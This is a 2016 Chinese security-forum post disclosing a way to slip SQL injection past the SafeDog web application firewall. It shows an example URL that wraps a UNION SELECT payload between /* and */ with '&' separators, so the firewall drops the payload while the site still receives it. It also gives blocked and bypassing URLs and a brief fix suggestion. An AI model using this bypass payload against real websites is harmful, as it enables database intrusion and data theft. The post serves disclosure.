HanDs
管理员

[7月漏洞公开] 完美绕过安全狗进行SQL注入/可使用sqlmap进行注入 



不能使用sqlmap的能叫完美?

详细说明:

研究比较新版本的安全狗都知道,在处理url是不会考虑&这个符号,当做平常的符号

并且会把/**/之间的内容替换为空,那么问题来了



code 区域
a=/*&ArticleID=17329%20union%20select%20xxx%20from%20%20xxx&b=*/



在安全狗眼里只剩下了a=空格,当然就绕过了

拦截 http://www.safedog.cn/?a=/*&ArticleID=17329%20union%20select%20xxx%20from%20%20xxx&b= 

绕过 http://www.safedog.cn/?a=/*&ArticleID=17329%20union%20select%20xxx%20from%20%20xxx&b=*/



code 区域
或许粗一看,被注释呢,但是仔细看



code 区域
a=/*&ArticleID=17329%20union%20select%20xxx%20from%20%20xxx&b=*/
中间有&符合进行隔离呢。。 web获得是17329%20union%20select%20xxx%20from%20%20xxx
如果ArticleID存在注入,肯定能出数据的,完美绕过

漏洞证明:

截图_2016-05-27_21-12-27.png

修复方案:

要不要考虑把/**/?给过滤掉?


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
完美 绕过 安全 进行 S QL
#1楼
发帖时间:2016-7-14   |   查看数:0   |   回复数:0
游客组
快速回复